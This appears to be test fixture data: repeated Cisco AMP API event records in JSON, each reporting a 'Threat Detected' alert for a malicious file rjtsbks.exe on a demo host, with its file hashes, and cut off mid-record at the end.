-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251520740131000,"timestamp":1610705860,"timestamp_nanoseconds":3000000,"date":"2021-01-15T10:17:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251520740130915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163617","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163616","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163615","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163613","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163612","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163610","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":816000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163609","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":738000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163608","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":644000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":629000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":598000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 